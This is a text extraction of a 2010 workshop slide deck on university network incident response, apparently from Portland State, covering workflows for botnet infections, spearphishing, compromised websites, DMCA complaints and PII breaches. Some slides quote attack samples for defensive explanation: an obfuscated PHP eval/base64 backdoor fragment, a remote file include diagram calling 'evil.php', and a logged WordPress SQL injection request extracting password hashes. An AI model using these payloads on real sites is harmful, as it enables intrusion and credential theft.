network incident response information security incident investigation for 2010 nwacc security...

Network Incident ResponseNetwork Incident Response

Information Security Incident InvestigationInformation Security Incident Investigation

For For

2010 NWACC Security Workshop2010 NWACC Security Workshop

Craig Schiller, CISSP-ISSMP, ISSAP

Network Forensics & Incident Response

2

AgendaAgenda

IntroductionIncident Response


3

Incident ResponseIncident Response

Required by most security policiesMost require a formal Incident Response

planYou should have several means of

discovering incidents


4

Incident ResponseIncident Response

Who’s watching your network?


5

Incident ResponseIncident ResponseIncident reported

Suspected Disaster

Suspected DMCA

Violation

Suspected VIF/Bot

Investigation Request

NO

NO

NO

DR WorkFlow

DMCA Workflow

VIF/Bot Workflow

Investigation Workflow

YES

YES

YES

YES

NO

Spearphishing

Spearphishing WorkflowYES

CompromisedWebsite

CompromisedWebsite

WorkflowYES

NO

PII exposed

PII Exposed WorkflowYES

Spamming /compromised

Account

Spamming Account

WorkflowYES

NO

Preservation Request

Preservation Request

WorkflowYES

NO

Access Request

Access Request

WorkflowYES

NO


6

IncidentIncident DetectionDetection

A/V, Anti-Spam, Anti-SpywareHost based

Security logsRUBotted – Trend Micro

Enterprise ReportingUser Help Desk TicketsAbuse notificationsQuasi-Intelligence OrganizationsMonitoring & Analysis

OurmonFirewall & Router logsIDS/IPS – Host and NetworkDarknets, HoneypotsDNSServer & Workstation Log analysisMalware analysis (Sandbox)Forensics


7

Investigative Process Investigative Process ModelModel

Persuasion and Testimony

Reporting

Analysis

Organization and Search

Reduction (Filtering)

Harvesting

Recovery

Preservation

Identification or Seizure

Incident/Crime Scene Protocols

Assessment of Worth

Accusation or Incident Alert

AssessmentExperimentFusionCorrelationValidation

CaseManagementSteps

Examination


8

Operation Aching MulesOperation Aching Mules


9

Operation Aching MulesOperation Aching MulesNYPD detectives entered a Bronx bank in February to investigate a suspicious $44,000 withdrawal. International investigation began in Omaha, in May when fraudulent ACH payments were made to 46 bank accountsCyber-attacks began in Eastern Europe, sending apparently-benign email to computers at small businesses and municipalities in the US

Clicking on a link downloaded Zeus

The malware recorded their keystrokes as they logged into their bank accounts online

Hackers made unauthorized transfers of thousands of dollars at a time to receiving accounts controlled by the co-conspirators.

Once the victim/employee begins executing an online banking transaction on behalf of his or her employer, ZeuS invisibly also executes a fraudulent wire transfer, usually for $10,000 or less.


10


Money MulesReceiving accounts were set up by a "money mule organization" responsible for retrieving the proceeds of the malware attacks and transporting or transferring the stolen money overseas.

The money mule organization recruited individuals who had entered the United States on student visas, provided them with fake foreign passports, and instructed them to open false-name accounts at U.S. banks.

Once these false-name accounts were successfully opened and received the stolen funds from the accounts compromised by the malware attacks, the "mules" were instructed to transfer the proceeds to other accounts, most of which were overseas, or to withdraw the proceeds and transport them overseas as smuggled bulk cash.


11


U.S. authorities charged 92 Russians and Eastern Europeans who allegedly opened U.S. bank accounts expressly to receive cash transferred from hacked online banking accounts.

The defendants charged in Manhattan federal court include managers of and recruiters for the money mule organization, an individual who obtained the false foreign passports.

19 Eastern Europeans were arrested in the UK. The Ukrainian SBU arrested 5 key subjects of the investigation.

$70M over the last four years.

http://lastwatchdog.com/?attachment_id=8282


12

VIF/BOT scenarioVIF/BOT scenarioVIF/Bot

Workflow

Botnet SensorsBotnet Sensors

Security Researcher

Internet

Wormwatch mailing list

131.252.x.x NERO says bad

131.252.x.x Acting Bad

131.252.x.x talking to bad

38.100.x.x McAfee says bad

Network Team User Support Server SupportTAGs

Create Tracking Ticket

Block Network access

Identify location

Identify computer or user


Retrieve computer

Backup all files

Perform quick forensics

Re-image computer

Identify ServIer or webpage owner

Identify compromised account

Locate malware

Determine attack vector

Security Team

Locate infected system

Identify system owner

Re-image computer


Review quick forensics

Perform deep forensics

Ensure appropriate resources are working the incident

Identify useful intelligence markers

McAfeeServer

User Reports


13

Incident Detection examplesIncident Detection examples

Reports from Anti-Virus Enterprise server

1. today, Mcafee, 131.252.242.243, pri=hi, JS/Wonka [**] [1:3111116:1] Mcafee http feed: :http://bluebookcarpices.com/ <http://pices.com/> (JS/Wonka) [**][Classification: access to a potentially vulnerable web application] [Priority: 2]05/21-08:13:56.950979 131.252.242.243:52733 -> 216.240.128.250:80 TCP TTL:63 TOS:0x0 ID:38398 IpLen:20 DgmLen:568 DF***AP*** Seq: 0xD222814A Ack: 0x278524DD Win: 0xFFFF TcpLen: 32 TCP Options (3) => NOP NOP TS: 345145726 2079777105

Reports from Intrusion Detection System (IDS)

2. today, zlob, 131.252.243.80, pri=hi[**] [1:666666:1] zlob dns request [**][Classification: Potentially Bad Traffic] [Priority: 2]05/21-09:50:22.532193 131.252.243.80:49190 -> 85.255.115.29:53 UDP TTL:63 TOS:0x0 ID:3755 IpLen:20 DgmLen:73Len: 45

http://bluebookcarpices.com/



http://pices.com/

http://pices.com/

http://pices.com/


14

Forensics/Internal Intel GatheringForensics/Internal Intel Gathering

• Quick Forensics• Process Explorer• TCPView• AutoRuns• Process Monitor

• Rpier – First Responder Tool• Automated Forensics• Consistent information gathered regardless of who runs it

• Sleuthing • How did they get in?• What does it do?• What files are used?• When did what happen?

• Malware Analysis

• More Sleuthing


15

I checked and I didn’t see anything

Security Event logSecurity Event log


16

Forensics/Intel Gathering exampleForensics/Intel Gathering example

Process PID CPU Description Company NameSystem Idle Process 0 93.36 Interrupts n/a 1.56 Hardware Interrupts DPCs n/a Deferred Procedure Calls System 4 0.39 smss.exe 508 Windows NT Session Manager Microsoft Corporation csrss.exe 620 Client Server Runtime Process Microsoft Corporation winlogon.exe 884 Windows NT Logon Application Microsoft Corporation services.exe 944 Services and Controller app Microsoft Corporation svchost.exe 1180 Generic Host Process for Win32 Services Microsoft Corporation wmiprvse.exe 3400 WMI Microsoft Corporation svchost.exe 1252 Generic Host Process for Win32 Services Microsoft Corporation svchost.exe 1312 Generic Host Process for PSXSS.EXE 896

Interix Subsystem Server Microsoft Corporationinit 2156 Interix Utility Microsoft Corporationinetd 2432 Interix Utility Microsoft Corporationiexplorer.exe 3560explorer.exe 8564 Windows Explorer Microsoft Corporation ccApp.exe 9208 Symantec User Session Symantec Corporation VPTray.exe 8636 Symantec AntiVirus Symantec Corporation VPC32.exe 9524 Symantec AntiVirus Symantec Corporation iexplorer.exe 6712 sqlmangr.exe 9904 SQL Server Service Manager Microsoft Corporation


17



18



19


Strings in the file iexplorer.exe

Strings in memory


20

Analyzing the MalwareAnalyzing the Malware

CWSandbox Analysis


21

Carsten Willem’s CWSandboxCarsten Willem’s CWSandbox

VMWare

XP Pro

Ubuntu


22

The FutureThe Future


23

MovieMovie

BUM60.MOV


24

Spearphishing scenarioSpearphishing scenario



Review quick forensics and perform deep forensics



Perform anti-spearphishing tasks

Contact Anti-spearphishing vendor

Contact phishing site hostt and ISP

Contact Aggregating sites

External Reporting


25

Spearphishing investigative modelSpearphishing investigative model

Investigation Method Step Spearphishing Response Scenario

Preparation Accusation or Incident Alert Notify – Make it easy for detection and notification to occur.

Assessment of Worth Prioritize this incident in relation to other work of the organization.


Begin the process of ensuring the admissibility of evidence

Detection Identification or Seizure Using the protocols established above, ensure that all potential network evidence is identified and documented.

Analysis Preservation Document the incident and open an incident ticket – Notify wormwatch

Recovery Identify and collect potential evidence from network and enterprise systems.

Harvesting Use experience to examine the collected data and identify class characteristics that might contribute to the investigation

Reduction Use the output of the Harvesting step to extract phishing site specific network traffic entries from evidence sources (firewall logs, tcpdump, Ourmon logs, Net Flow data, etc.)

Organization and Search Use consistent naming schemes and folder hierarchies. Make it easier for the investigator to find and identify data during the Analysis investigation step. Enable repeatability and accuracy of subsequent analysis.

Analysis Analyze the timeline (temporal analysis), the relationships between the phisher’s IP addresses and other attacks (relational analysis), conditions or data that might tend to make the incident possible or impossible (functional analysis). Analyze the IP addresses to ID source. Determine why this victim was selected (Victimology).


26

Spearphishing investigative modelSpearphishing investigative model

Containment, None Triage – stop the bleeding. Identify the compromised account owner. Keep future attempts using the attack vector from reaching their intended target. Feed the attackers IP addresses to local detection software and networking. Contact IP related ISPs or host organizations

Eradication None Search mail systems for other compromised accounts. Locate and re-image any system that downloaded malware

Recovery None Recover the compromised account. Prevent the attackers from continuing to use the compromised accounts. Return the users system to normal operation. Educate the users on spearphisher techniques and how to recognize them

Post-Incident Activity

Reporting Contact Law Enforcement

Feed the attackers IP addresses to intelligence aggregation organizations


Prepare presentations and brief executive management. Give awareness presentations to relevant stakeholders.


27

Spearphishing emailSpearphishing email


28

Recover userful informationRecover userful information

You can extract the following information from the spearphishing email:The from and reply-to email addresses. The subject line and message IDThe URL of the phishing siteThe originating IP addressThe domain of the originating IP addressThe domain of the phishing site


29

Spearphishing emailSpearphishing emailReturn-Path: <[email protected]>Received: from murder (beli.oit.pdx.edu [131.252.122.1])

by backend03.psumail.pdx.edu (Cyrus v2.2.12) with LMTPSA (version=TLSv1/SSLv3 cipher=AES256-SHA bits=256/256 verify=YES); Tue, 13 Jul 2010 09:40:08 -0700

X-Sieve: CMU Sieve 2.2Received: from beli.oit.pdx.edu ([unix socket])

by psumail.pdx.edu (Cyrus v2.2.13) with LMTPA; Tue, 13 Jul 2010 09:40:08 -0700

Received: from nithog.oit.pdx.edu (nithog.oit.pdx.edu [131.252.120.55])by beli.oit.pdx.edu (8.14.1+/8.13.1) with ESMTP id o6DGe8L5014251for <[email protected]>; Tue, 13 Jul 2010 09:40:08 -0700

Received: from gtwy.camden.k12.ga.us (mail.camden.k12.ga.us [168.11.97.73])by nithog.oit.pdx.edu (8.14.1+/8.13.1) with ESMTP id o6DGe6Ow021644for <[email protected]>; Tue, 13 Jul 2010 09:40:07 -0700

X-Authentication-Warning: nithog.oit.pdx.edu: Host mail.camden.k12.ga.us [168.11.97.73] claimed to be gtwy.camden.k12.ga.usReceived: from gtwy.camden.k12.ga.us (unknown [127.0.0.1])

by IMSA (Postfix) with ESMTP id 62BD211014E;Tue, 13 Jul 2010 12:40:05 -0400 (EDT)

Received: from exchange2.camden.k12.ga.us (unknown [168.11.97.41])by gtwy.camden.k12.ga.us (Postfix) with ESMTP id DF3E711014B;Tue, 13 Jul 2010 12:40:04 -0400 (EDT)

X-MimeOLE: Produced By Microsoft Exchange V6.5Content-class: urn:content-classes:messageMIME-Version: 1.0Content-Type: text/plain;

charset="iso-8859-1"Content-Transfer-Encoding: quoted-printableSubject: Mailbox QuotaDate: Tue, 13 Jul 2010 12:40:03 -0400Message-ID: <85A63B83E0776A4E8D5416E0A7E805490BDBAA2D@exchange2.camden.k12.ga.us>From: "Sandra J. Deloach" <[email protected]>To: undisclosed-recipients:;


30

Limit the damageLimit the damage

Block outbound traffic to IP address

Block by web filtering

DNS Cache PoisoningYour DNS server could intercept and poison any responses to systems that lookup either domain. By replacing the actual DNS response with an address in your Darknet and instrumenting a system with that address you could gain a warning every time someone responded to the attack.


31

Spearphish Campaign spreadsheetSpearphish Campaign spreadsheet


32

Phishing websitePhishing website


33

Gathering intelligenceGathering intelligence

100713-spearphishing-passwords.saz


34

Gathering intelligenceGathering intelligence


35

Gather Intelligence

Extracted passwords


36

Compromised Accounts Compromised Accounts (spammers)(spammers)

E-mail server

Server Support

Internet

Maintain list of Bad actors

Monitor logins for bad actors

Monitor sent mail thresholds

Search for phish responders

Disable accounts

User Support

Look up contact info

Contact user

Change password

Clean Signatures

Request account re-enable

Security Team

Notify Server support about phishing responders

Confirm user account is supposed to be active

User Interaction


37

Search Engine Spam – Victimless crime?Search Engine Spam – Victimless crime?

Is it really victimless?

Cheat the poor and technology weak out of their hard-earned money

Operators of Search engine spam sites are linked to Child Porn

Reputational damage and DoS


38

Damage to Your University’s ReputationDamage to Your University’s Reputation


39

Search Engine Spam Search Engine Spam

Security Team

Internet

Process Google Alert

Analyze Compromised Web Site


ID website owner/developer

Analyze Malware

Network Team Server Support TAGs

Block Network access Send malware to Security Team

Mitigate vulnerability

Shutdown Webpage access

Collect and Analyze logs

Clear the Google cache

Website Owner




Restore Webpage

Work with Server Support

Limit damage

Find Root cause


Restore Webpage & ask to restore access

Keep Security Team informed on status

Google Alerts

External email notice



Locate malware


Determine exploited vulnerability



Contact ISP and/or website owner and linked pages

Share with aggregators



40

Search Engine Spam & Clicks 4 HireSearch Engine Spam & Clicks 4 Hire

site:yoursite.com -pdf -ppt -doc phentermine OR viagra OR cialis OR vioxx OR oxycontin OR levitra OR ambien OR xanax OR paxil OR "slot-machine" OR "texas-holdem"

Use Google to search for Clicks-4-Hire relays and search engine spam


41

Google site search resultsGoogle site search results


42

Google AlertsGoogle Alerts

[email protected]


43

Google Alerts ResultsGoogle Alerts Results


44

An owned webpageAn owned webpage


45

Browser Intelligence gatheringBrowser Intelligence gathering


46

Links to this web pageLinks to this web page


47

Fiddler sleuthingFiddler sleuthing


48

Base64 EncodingBase64 Encoding

<?phpeval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdF9saXN0ID0gYXJyYXkoIjguNi40OCIsIjYyLjE3Mi4xOTkiLCI2Mi4yNy41OSIsIjYzLjE2My4xMDIiLCI2NC4xNTcuMTM3IiwiNjQuMTU3LjEzOCIsIjY0LjIzMy4xNzMiLCI2NC42OC44MCIsIjY0LjY4LjgxIiwiNjQuNjguODIiLCI2NC42OC44MyIsIjY0LjY4Ljg0IiwiNjQuNjguOD


49



50


if (preg_match('/live|msn|yahoo|google|ask|aol/', $_SERVER["HTTP_REFERER"])) {

$tabs = array ('viagra','cialis','levitra','propecia','prozac','xenical','soma','zoloft','tamiflu','sildenafil','tadalafil','vardenafil','finasteride','hoodia','acomplia','phentermine','adipex','tramadol','ultram','xanax','valium','ambien','ativan','vicodin','hoodia','acomplia');

$niche='unknown';foreach($tabs as $tab) {

if(preg_match("/$tab/", $_SERVER["HTTP_REFERER"]))


51

302 Error hijacking302 Error hijacking

If the source of the highlighted URL differs from the source when you browse directly to the same page, then the spammers may be hijacking your Google response.

Google hijacking presents a serious challenge to your eradication efforts as Google has not provided a process for dealing with these incidents.

See the web page (http://www.loriswebs.com/find-hijacker.html) for more information about 302 errors and Google hijacking. She also has directions for reporting 302 error hi-jacking located here (http://www.loriswebs.com/report-302redirect.html).

This process attempts to address the hi-jacking by approaching the ISP or hosting service, reporting the incident as a terms of service violation. It’s the best you can do until Google addresses the issue of de-coupling sites that shouldn’t be able to influence the search engine results about your sites.

http://www.loriswebs.com/find-hijacker.html

http://www.loriswebs.com/report-302redirect.html


52

Search Engine Spam removalSearch Engine Spam removal

1. Info-Security/Website owner monitors Google alerts2. Info-Security/Webserver Administration locates the web server

administrator and create a ticket in the appropriate help desk ticket queue. The organizational communications office should be cc’d in the ticket.

3. Unix/other webserver administrator resets permissions so they are no longer www/world-writable then captures and deletes offending files

4. Unix/other webserver administrator attempts to locate and mitigate the initial attack vector

5. Unix/other admin clears google cache6. Unix/other admin moves the help desk ticket back to the security-requests

queue7. Info-Security/Webserver Administration notifies the site owner (see below

for text) and BCCs [email protected]. Info-Security closes the ticket


53

Compromised WebsiteCompromised Website

Botnet Sensors(Ourmon, FireEye, Snort)

Security Researcher

Internet


131.252.x.x NERO says bad

131.252.x.x Acting Bad

131.252.x.x talking to bad

38.100.x.x Extternal source says bad

User SupportServer Support

TAGs

Route HelpDesk tickets to Security

Route Tickets to Server, TAG or

Website Owner



Locate malware


Security Team



Re-image computerUser

Interaction

Google AlertsExternal email notice

Process Google Alert

Analyze Compromised Web Site


ID website owner/developer

Analyze Malware



Contact target ISP and/or website owner & linked pages

Share with aggregators


Website Owner

Limit damage

Find Root cause


Restore Webpage & ask to restore access

Keep Security Team informed on status


54

Uploading fake picturesUploading fake pictures

Webhost.com

1. Evil user post a executable file with a .gif extension (notapic.gif)

2. Evil user browses to the executable gif

Attacker

3. Webhost executes notapic.gif as web page owner


55

Php url includesPhp url includes

Target.com

Webhost.com

1. Get /a.php?vuln=http://webhost.com/evil.php

2. Target makes request to wehost.com/evil.php

3. Malware PHP file ‘evil.php’ is sent to Target.comAnd is executed by the include() function.

4. The Output from evil.php is sent to Attacker

<?php include($vuln); ?>

Attacker


56

Mod-Sec SQL InjectionMod-Sec SQL Injection

--346e283e-A--[04/Aug/2008:02:30:00 --0700] @7eQMYP8ehcAAE5qKi4AAAAR 87.118.116.150 47075 131.252.122.155 80--346e283e-B--GET /shesheet/wordpress/index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.0Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; DigExt)Host: www.wrc.pdx.eduConnection: close

--346e283e-F--HTTP/1.0 200 OKX-Powered-By: PHP/5.2.5X-Pingback: http://www.wrc.pdx.edu/shesheet/wordpress/xmlrpc.phpConnection: closeContent-Type: text/html; charset=UTF-8

--346e283e-H--Message: Warning. Pattern match "(?:\\b(?:(?:s(?:elect\\b(?:.{1,100}?\\b(?:(?:length|count|top)\\b.{1,100}?\\bfrom|from\\b.{1,100}?\\bwhere)|.*?\\b(?:d(?:ump\\b.*\\bfrom|ata_type)|(?:to_(?:numbe|cha)|inst)r))|p_(?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql)?|makewebt ..." at ARGS:cat. [id "950001"] [msg "SQL Injection Attack. Matched signature <union select>"] [severity "CRITICAL"]Stopwatch: 1217842199892017 888678 (5475 6478 -)Producer: ModSecurity v2.1.5 (Apache 2.x)Server: Apache/2.2.8 (OpenPKG/CURRENT)--346e283e-Z--


57

DMCADMCA

Investigate “It wasn’t me” claims

Investigate questionable DMCA complaints

Give DMCA formal sanction presentation

Coordinate strategy with SLMS & Dean of Students

Sign form when complete

Horde

Internet

Email to [email protected]

From copyright owner

From consortium rep. owner

Settlement bids

Organized crime

Network Team Dean of StudentsUser Support

Extract DMCA complaints



Email and mail user

If no response or 2nd violation

Counsel student of legal aspects

Sign form when complete

Coordinate strategy with DoS & CISO

Security Team

Process AUP violation

Communicate with user

Issue Sanctions

Inform NTS that sanctions have been satisfied

User Reports

DMCA complaint

Abuse Imap Folder

Refer “It wasn’t me” claims

Receive user responses

Forward responses to NTS

Student Legal

Block Network access

File AUP violation with Dean of Students


5858

DMCA Investigative processDMCA Investigative processInvestigation Method Step

DMCA Violations Response Scenario

Preparation Accusation or Incident Alert

Notify – Most notifications are sent to your abuse email address. Final stages (subpoenas) may be sent via snail mail. Notifications that skip the “Take-Down” notice stage should be vetted. Seek legal counsel’s advice about forwarding suspect notices

Assessment of Worth

You are legally obligated to forward DMCA notices to the intended recipient in a timely manner. Failure to do so could cost “Safe Harbor” status and could result in your organization being made a party to the resulting lawsuits. You should only investigate the claim if a user disputes the allegation.


Begin the process of ensuring the admissibility of evidence. Designate an organization and an individual to be responsible for keeping all DMCA documentation. All copies of notices and responses from the suspect should be retained. Any analysis performed related to the case should be identified and preserved with the other case documentation.

Detection Identification or Seizure

Using the protocols established above, ensure that all potential network evidence is identified and documented. Ensure that the IP to dhcp mapping is captured in a timely manner since it is dynamic and dhcp logs may not last forever.

Analysis Preservation Document the incident Open Incident Ticket – Use special DMCA queue for all DMCA related tickets

Recovery Identify and collect potential evidence from network and enterprise systems. These notices sometimes come months after the actual event. If user disputes the claim, and the logs still exist, gather them from firewalls, switches, Ourmon, or dhcp. If too much time has passed your may have to rely on the suspect’s computer. The suspect may be hostile to your investigation, even if innocent. They may ask you to investigate while attempting to obscure the evidence of the incident.

Harvesting Use experience to examine the collected data and identify class characteristics that might contribute to the investigation. In DMCA cases you are primarily performing functional analysis. You are looking for evidence that would include or exclude the user’s computer from the alleged act (such as right or wrong Mac address, presence or absence of network traffic supporting the allegation, etc.)


5959

DMCA Investigative processDMCA Investigative processReduction Use the output of the Harvesting step to extract allegation specific network traffic entries from evidence

sources (firewall logs, tcpdump, Ourmon logs, Net Flow data, etc.). From the suspect’s computer you might extract firewall logs, Internet history, Internet browser caches, temporary Internet files.

Organization and Search

Use consistent naming schemes and folder hierarchies. Make it easier for the investigator to find and identify data during the Analysis investigation step. Enable repeatability and accuracy of subsequent analysis.

Analysis Locating the user’s identity will involve relational analysis For LAN connections your network team will examine relationships between the IP address, MAC address and a time frame, between the MAC address, the dhcp server, and the switch; between the switch, the MAC address, and the switch port; between the switch port and data jack; between the data jack and a physical location; and between the physical room and the people associated with that room. Authenticated wireless connections at Portland State tie the userid to an IP address at a particular time. If the user disputes the copyright owner’s claims then you will perform temporal analysis to group all activities that were recorded during the time of the alleged incident. You would then use the results of temporal analysis to perform functional analysis, in which you determine if the available evidence tends to support claim of the copyright holder or not. If not, then you should determine if the evidence points to another suspect or if there is no data related to the incident. If this is the case consider and investigate the potential that the notice was fraudulent. Determine why this victim was selected (Victimology).

Containment,

None Triage – Your organization is obligated by DMCA to prevent the recurrence of this kind of event. Most organizations shut off internet access if the suspect is notified three times. Portland State performs this action on the second notices. If the suspect is a student, the Dean of Students is notified. In order to regain network access, the student must attend briefings by Student Legal and Mediation Services and by IT. The Dean of Students can take other punitive actions if there are further incidents, such as Loss of Network privileges for a year, or fines of up to $200.

Eradication None Subjects are directed to remove all copyrighted material that was identified in the take-down notice.


6060

DMCA Investigative processDMCA Investigative process

Recovery None Subjects are directed to respond to the notice in which they acknowledge having received the notice, that they understand the DMCA policy, and that they will comply with it in the future. They are instructed to take down the intellectual property that was identified in the notice. The subject is not required address guilt or innocence. Once they have followed the instructions then their network access is restored. Users who receive two or more notices are required to attend a DMCA awareness briefing.

Post-Incident Activity

Reporting Annually, the numbers of notices received and presentations given should be reported to management. Subpoenas, notices of intent to file a subpoena, and settlement offer letters should be reported to General Counsel


Prepare presentations and brief executive management. Give awareness presentations to relevant stakeholders. Prepare pamphlets, informational websites, flyers, etc to reduce the rate of DMCA incidents.


6161

DMCA WorkflowDMCA Workflow


6262

PII Suspected IncidentPII Suspected Incident

• Is it an incident?• Incidents require mitigation• Incidents may or may not require notification

• Is it a breach?• Breaches require mitigation• Breaches require notification

All breaches are incidents but not all incidents are breaches


6363

What is a Breach?What is a Breach?

A (reportable) breach is the unauthorized acquisition, access, use, or disclosure of PII in a manner not permitted by law or regulation and which compromises the security and privacy of the PII.

Paraphrased from a PHI breach definition by Pepper Hamilton, LLP

We are using the term breach to describe all incidents that legally require notification to damaged parties.


6464

Relevant Law or RegulationRelevant Law or Regulation

FERPA: protection of student dataFACTA Red Flag Rules: financePayment Card Industry Data Security Standard: credit cardsGramm-Leach-Bliley (GLB) Act: financial consumers USA Patriot Act: data preservation and wiretapping requestsStudent and Exchange Visitor Information System (SEVIS): international studentsHigher Education Opportunity Act: record keeping, business processes, and reportingHealth Insurance Portability and Accountability Act (HIPPA): health recordsHITECH Act – Private Health Information, breach notification and enforcementDigital Millennium Copyright Act (DMCA): protection of digital mediaElectronic discovery (E-discovery): also Rule 37 of the Federal Rules of Civil ProcedureJeanne Clery Disclosure of Campus Security Policy and Campus Crime Statistics Act (Clery Act): campus crimeState law – e.g. Oregon Identity Theft Protection Act

Personally Identifiable Information breach notificationState law regarding disclosure of Faculty/Staff recordsPCI Standards– credit card and bank account informationVISA PA-DSS Best Practices and Validated Applications list Others? Information covered by NDAs, Information protected by export law

http://www.ed.gov/policy/gen/guid/fpco/ferpa/index.html

http://www.ftc.gov/opa/2007/10/redflag.shtm

https://www.pcisecuritystandards.org/

http://www.gpo.gov/fdsys/pkg/PLAW-106publ102/content-detail.html

http://www.gpo.gov/fdsys/pkg/PLAW-107publ56/content-detail.html

http://www.ice.gov/sevis/

http://www.ed.gov/policy/highered/leg/hea08/index.html

http://www.hhs.gov/ocr/privacy/index.html

http://www.hhs.gov/ocr/privacy/hipaa/understanding/coveredentities/hitechblurb.html

http://www.copyright.gov/legislation/dmca.pdf

http://en.wikipedia.org/wiki/Electronic_discovery

http://www.uscourts.gov/rules/CV2008.pdf

http://www.securityoncampus.org/index.php?option=com_content&view=article&id=271&Itemid=60

https://www.pcisecuritystandards.org/

http://usa.visa.com/merchants/risk_management/cisp_payment_applications.html


6565

Breach or Incident?Breach or Incident?

Two methods for Determining if a breach occurred• By Definition• By Risk of Harm Analysis

• How do you prove a negative?


6666

What if there is no known What if there is no known Harm?Harm?

A compromise of the security and privacy of personal private information must pose a significant risk of financial, reputational, or other harm to the individual.

Use a risk assessment to determine if harm exists.

Pepper Hamilton LLP Webinar

Not all disclosures will be breaches - it must cross the harm threshold.

Overcoming access controls does not constitute a breach by itself. It must lead to a use and disclosure of PPI that is not permitted by law or regulation and it must also cross the “harm threshold.”


6767

Were the recipients obligated (by policy or regulation) to protect privacy and security of the information?Can the impact of the disclosure be mitigated?

Pre-existing NDAs or other measure which assure no further disclosure

Was it returned before improper use could occur?Did forensics investigation find any evidence of improper use, discovery, or distribution?

What was disclosed and how much?

Risk of Harm QuestionsRisk of Harm Questions


6868

No Breach?No Breach?

A Breach has not Occurred if:

PII is not stored in the cloudPII is “Secured” (encrypted*)There is Little Risk of Harm

Pepper Hamilton, LLP

* some states also exempt encoded data


69

Activity: Putting it in to practiceActivity: Putting it in to practice

69

Questions:

Is this a breach or incident?What process did you use to make your decision?Who needs to be notified? How?What mitigation may be necessary?


7070

ScenariosScenariosSuspected incidents

• A former student reports to you that, using Google, he has found his SSN on one of your systems.• A professor reports to you that his laptop was stolen and in it he maintained a list of student names and Student-ID numbers. • A professor discovers that he can see other employee’s home directories. • A staff person discovers advising files of current and former students available to view by all authenticated users on web accessible storage service• A website hosted in the cloud is de-faced.


7171

SSN found via GoogleSSN found via Google

One of your former student reports to you that, using Google, he has found his SSN on one of your systems.

• Data, when stored (2004), was not considered sensitive• Some data was not PII but was still sensitive• Data was stored on a Listserv which Google crawled• IN 2005-2007, some instances were removed from the Listserv

• But not from Google’s cache of the webpage!


7272

SSN Breach-ResponseSSN Breach-ResponseDiscovery• Searched for other, similar PII data• Determine where other instances may have been cached (Internet Time Machine, Google,

etc.)Short-term mitigation• Known PII Data was taken down• Google’s cache was flushed• Listserv was reconfigured to change all lists to privateNotification • Met with General Counsel and HR

• Determined this was a breach (by definition and risk of harm analysis)• Briefed executive level• Drafted a letter to send to the potential victims• For sensitive data not covered by law or regulation, the business owner was given the

option to notify or not (subject to executive override)Long-term Mitigation• Reviewed lists and deleted all lists that haven’t had activity in 2 years (time- bomb of unnecessary liability)• Changed our process to make private the default listserv settingAwareness • Discussed posting practices with listserv owner• Documented and Responded to users questions from the notification


7373

Student IDStudent IDOne of your professors reports to you that his laptop was stolen and in it he maintained a list of student names and Student-ID numbers.

Is it a breach by definition?

According to the Dec 2008 FERPA revision, it depends.


7474

Student IDStudent ID“we modified the rule to allow student ID numbers to be disclosed as directory information if they qualify as electronic identifiers”

“The regulations will allow an educational agency or institution to disclose as directory information a student’s ID number, user ID or other electronic identifier so long as the identifier functions like a name; that is, it cannot be used without a PIN, password, or some other authentication factor to gain access to education records. This change will impose no costs and will provide benefits in the form of regulatory relief allowing agencies and institutions to use directory services in electronic communications systems without incurring the administrative costs associated with obtaining student consent for these disclosures.”


7575

Student IDStudent ID"Directory Information", data that can be made public without *student* permission. Each college must decide, within certain limits, what it considers Directory Information, and must publish the list. Typically this includes things like name, phone number, address, graduation year, and major. According to FERPARegulations, Directory Information is "information contained in an education record of a *student* that would not generally be considered harmful or an invasion of privacy if disclosed".

Steven Worona

In order to treat the student id as directory information, each college must officially declare it to be so and publish the new list of directory information.


7676

ExceptionException

However, parents and eligible students can opt out of directory information disclosures; those that do will not be able to participate in student services that are delivered in this manner.

Which means you may have a student id related breach for a few students even after declaring student identification to be directory information.


7777

Student ID Breach-ResponseStudent ID Breach-Response

Discovery• Interviewed the Professor, determined there was only one instance of the lost dataShort-term mitigation• NoneNotification • Met with General Counsel, Admissions, Records, and Registration (ARR) and HR

• Determined this was a breach (by definition)• Briefed executive level• Drafted a letter to send to the potential victims, by the Professor’s department

Long-term Mitigation• Pursue including student-id as directory informationAwareness • Gave presentations about student-ID as directory information.• Began discussions with General Counsel and ARR


78

Small Private College with Law Small Private College with Law SchoolSchool

An Information Technology staff person discovered advising files of 14 current and former students available to view by all authenticated users (only) on our web accessible storage service (Xythos). The files contained high school transcripts and College application materials for our first year advising program. These files contained personally identifying information (SSN and birthdate).

Upon finding this information available, the IT staff person immediately made a “copy” of the environment for forensics purposes and then removed the permissions from the files to protect that sensitive information. It was determined that the files were accessible to all authenticated users (and not the general public) for one week. We were not able to determine if the files had been viewed by anyone during that time period.

78


79

Small Private College with Law Small Private College with Law SchoolSchool

General Counsel advised that we notify the affected 14 individuals per the Oregon notification legislation. The notification happened on September 2 through email and certified postal mail, and offered a year of credit monitoring (for which no one took us up on). Post incident: We immediately suspended the first year advising application utilizing the web storage service until the sensitive information could be redacted from the scanned images. Going forward all personally identifying information will be redacted upon scanning.

79


8080

College with Law School College with Law School ResponseResponse

Discovery• IT staff member discovered sensitive files for 14 students were viewable by any

authenticated userShort-term mitigation• Copy of the environment made for forensics• Removed permissions from the sensitive files• Analyzed exposure (1 week), unable to determine if anyone viewed the files • Suspended the application from using the web storage service until the sensitive

information could be redacted from the scanned imagesNotification • Can’t determine risk of harm• Met with General Counsel, determined this was a breach• Notified users via email and postal mail. • Offered 1 year of credit monitoringLong-term Mitigation• Implement process to redact PII upon scanning. Awareness • Additional training may be indicated


8181

Missing Access ControlMissing Access Control

A University professor discovers that he can see other employee’s home directories.


8282

Access ControlsAccess ControlsYour staff discovers that six days ago the ACLs on your

staff directories/folders were unintentionally modified for a vendor.

• Inheritance was turned off, which changed all lower level effective permissions.

• Directories normally protected by restrictive ACLs were modified to permit read-only access by anyone with an active account.

• Some of the folders definitely contain PII.• Audit trail object access was not enabled.


8383

Access ControlsAccess ControlsRan Spider (from Cornell University) to identify PII at risk• One month to scan 10 volumes on the file server.• Identified all files accessed during the exposure period.

This significantly reduced the number of files at risk as 70.8% of all files were not accessed during the exposure period.

